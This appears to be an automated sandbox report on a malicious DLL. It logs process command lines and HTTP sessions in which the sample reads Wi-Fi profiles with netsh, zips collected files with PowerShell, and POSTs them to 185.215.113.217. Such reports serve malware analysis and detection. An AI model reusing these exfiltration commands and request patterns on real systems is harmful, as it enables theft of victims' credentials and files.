                              Data Ascii: id=246122658369&cred=
                              Oct 27, 2024 17:47:06.286526918 CET | 190 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Sun, 27 Oct 2024 16:47:06 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              1 | 192.168.2.4 | 49731 | 185.215.113.217 | 80 | 7116 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Oct 27, 2024 17:47:05.255920887 CET | 174 | OUT | POST /CoreOPT/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.217
                              Content-Length: 21
                              Cache-Control: no-cache
                              Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d
                              Data Ascii: id=246122658369&cred=
                              Oct 27, 2024 17:47:06.264381886 CET | 190 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Sun, 27 Oct 2024 16:47:06 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0
                              Oct 27, 2024 17:47:23.432248116 CET | 170 | OUT | POST /CoreOPT/index.php?wal=1 HTTP/1.1
                              Content-Type: multipart/form-data; boundary=----MzA4MQ==
                              Host: 185.215.113.217
                              Content-Length: 3241
                              Cache-Control: no-cache
                              Oct 27, 2024 17:47:23.432476044 CET | 140 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 4d 7a 41 34 4d 51 3d 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36
                              Data Ascii: ------MzA4MQ==Content-Disposition: form-data; name="data"; filename="246122658369_Desktop.zip"Content-Type: application/octet-stream
                              Oct 27, 2024 17:47:23.432559013 CET | 6 | OUT | Data Raw: 50 4b 03 04
                              Data Ascii: PK
                              Oct 27, 2024 17:47:23.432637930 CET | 6 | OUT | Data Raw: 14 00 00 00
                              Data Ascii:
                              Oct 27, 2024 17:47:23.432687998 CET | 6 | OUT | Data Raw: 08 00 54 40
                              Data Ascii: T@
                              Oct 27, 2024 17:47:23.432775021 CET | 6 | OUT | Data Raw: 44 57 2f 31
                              Data Ascii: DW/1
                              Oct 27, 2024 17:47:23.432797909 CET | 6 | OUT | Data Raw: d7 cb 82 02
                              Data Ascii:
                              Oct 27, 2024 17:47:23.432848930 CET | 6 | OUT | Data Raw: 00 00 02 04
                              Data Ascii:
                              Oct 27, 2024 17:47:23.432912111 CET | 6 | OUT | Data Raw: 00 00 17 00
                              Data Ascii:
                              Oct 27, 2024 17:47:23.432952881 CET | 6 | OUT | Data Raw: 00 00 5f 46
                              Data Ascii: _F
                              Oct 27, 2024 17:47:23.433193922 CET | 6 | OUT | Data Raw: 69 6c 65 73
                              Data Ascii: iles
                              Oct 27, 2024 17:47:23.976797104 CET | 190 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Sun, 27 Oct 2024 16:47:23 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              2 | 192.168.2.4 | 49732 | 185.215.113.217 | 80 | 7220 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Oct 27, 2024 17:47:11.382829905 CET | 174 | OUT | POST /CoreOPT/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.217
                              Content-Length: 21
                              Cache-Control: no-cache
                              Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d
                              Data Ascii: id=246122658369&cred=
                              Oct 27, 2024 17:47:12.415534973 CET | 190 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Sun, 27 Oct 2024 16:47:12 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0



                              Target ID:0
                              Start time:12:47:03
                              Start date:27/10/2024
                              Path:C:\Windows\System32\loaddll32.exe
                              Wow64 process (32bit):true
                              Commandline:loaddll32.exe "C:\Users\user\Desktop\0j6nSbUQQS.dll"
                              Imagebase:0x860000
                              File size:126'464 bytes
                              MD5 hash:51E6071F9CBA48E79F10C84515AAE618
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:1
                              Start time:12:47:03
                              Start date:27/10/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:2
                              Start time:12:47:03
                              Start date:27/10/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\0j6nSbUQQS.dll",#1
                              Imagebase:0x240000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:3
                              Start time:12:47:03
                              Start date:27/10/2024
                              Path:C:\Windows\SysWOW64\rundll32.exe
                              Wow64 process (32bit):true
                              Commandline:rundll32.exe C:\Users\user\Desktop\0j6nSbUQQS.dll,Main
                              Imagebase:0x860000
                              File size:61'440 bytes
                              MD5 hash:889B99C52A60DD49227C5E485A016679
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:4
                              Start time:12:47:03
                              Start date:27/10/2024
                              Path:C:\Windows\SysWOW64\rundll32.exe
                              Wow64 process (32bit):true
                              Commandline:rundll32.exe "C:\Users\user\Desktop\0j6nSbUQQS.dll",#1
                              Imagebase:0x860000
                              File size:61'440 bytes
                              MD5 hash:889B99C52A60DD49227C5E485A016679
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:5
                              Start time:12:47:03
                              Start date:27/10/2024
                              Path:C:\Windows\SysWOW64\netsh.exe
                              Wow64 process (32bit):true
                              Commandline:netsh wlan show profiles
                              Imagebase:0x1560000
                              File size:82'432 bytes
                              MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:6
                              Start time:12:47:03
                              Start date:27/10/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:7
                              Start time:12:47:03
                              Start date:27/10/2024
                              Path:C:\Windows\SysWOW64\netsh.exe
                              Wow64 process (32bit):true
                              Commandline:netsh wlan show profiles
                              Imagebase:0x1560000
                              File size:82'432 bytes
                              MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:8
                              Start time:12:47:03
                              Start date:27/10/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:9
                              Start time:12:47:05
                              Start date:27/10/2024
                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):false
                              Commandline:powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
                              Imagebase:0x7ff788560000
                              File size:452'608 bytes
                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:10
                              Start time:12:47:05
                              Start date:27/10/2024
                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):false
                              Commandline:powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
                              Imagebase:0x7ff788560000
                              File size:452'608 bytes
                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:11
                              Start time:12:47:05
                              Start date:27/10/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:12
                              Start time:12:47:05
                              Start date:27/10/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:13
                              Start time:12:47:06
                              Start date:27/10/2024
                              Path:C:\Windows\SysWOW64\rundll32.exe
                              Wow64 process (32bit):true
                              Commandline:rundll32.exe C:\Users\user\Desktop\0j6nSbUQQS.dll,Save
                              Imagebase:0x860000
                              File size:61'440 bytes
                              MD5 hash:889B99C52A60DD49227C5E485A016679
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:14
                              Start time:12:47:09
                              Start date:27/10/2024
                              Path:C:\Windows\SysWOW64\rundll32.exe
                              Wow64 process (32bit):true
                              Commandline:rundll32.exe "C:\Users\user\Desktop\0j6nSbUQQS.dll",Main
                              Imagebase:0x860000
                              File size:61'440 bytes
                              MD5 hash:889B99C52A60DD49227C5E485A016679
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:15
                              Start time:12:47:09
                              Start date:27/10/2024
                              Path:C:\Windows\SysWOW64\rundll32.exe
                              Wow64 process (32bit):true
                              Commandline:rundll32.exe "C:\Users\user\Desktop\0j6nSbUQQS.dll",Save
                              Imagebase:0x860000
                              File size:61'440 bytes
                              MD5 hash:889B99C52A60DD49227C5E485A016679
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:16
                              Start time:12:47:09
                              Start date:27/10/2024
                              Path:C:\Windows\SysWOW64\netsh.exe
                              Wow64 process (32bit):true
                              Commandline:netsh wlan show profiles
                              Imagebase:0x1560000
                              File size:82'432 bytes
                              MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:17
                              Start time:12:47:09
                              Start date:27/10/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:18
                              Start time:12:47:11
                              Start date:27/10/2024
                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):false
                              Commandline:powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
                              Imagebase:0x7ff788560000
                              File size:452'608 bytes
                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:19
                              Start time:12:47:11
                              Start date:27/10/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true
